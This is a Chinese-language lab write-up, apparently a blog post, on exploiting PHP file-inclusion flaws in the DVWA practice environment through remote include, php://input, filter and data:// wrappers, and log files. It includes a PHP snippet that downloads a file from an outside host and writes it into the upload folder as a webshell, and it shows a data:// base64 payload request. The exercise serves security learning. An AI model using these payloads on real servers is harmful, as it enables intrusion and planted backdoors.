参考资料:
介绍php几种协议及使用方法:https://www.cnblogs.com/iamstudy/articles/include_file.html
如何利用文件上传漏洞getshell:https://blog.csdn.net/xysoul/article/details/46689049/
介绍日志文件包含漏洞:https://www.cnblogs.com/my1e3/p/5854897.html
1、利用dvwa创建漏洞环境,允许包含URL。
2、验证存在文件包含漏洞。
3、测试远程包含文件。
4、测试写入一句话。
远程直接包含一句话,无法正常使用,需要进一步确认。
5、测试phpinput方法,成功。
解决权限问题后,就可以直接写入webshell了。
具体代码如下:
<?php
$f=file_get_contents(“http://www.xxx.cn/m4r10.txt”); //打开指定路径的文件流
$ff=fopen(“./upload/m4r10.php”,”a”); //寻找一个可以的目录,创建一个文件
fwrite ($ff,$f); //把前面打开的文件流写到创建的文件里
fclose($ff); //关闭保存文件
?>
6、php filter方法。
7、data方法。
GET /dvwa/vulnerabilities/fi/?page=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOw==
8、尝试包含日志文件。
www-data用户,默认没有访问日志文件的权限,未进行此次实践。
遗留问题:
1、新版的kali,上传php一句话,菜刀无法连接,原因未知(格式不兼容?)。
2、参考链接1中,其他封装协议处,zip,phar等,不理解具体用途和使用方法。
3、apache用户为www-data,没有访问/var/log的权限,如何记录日志?
网友评论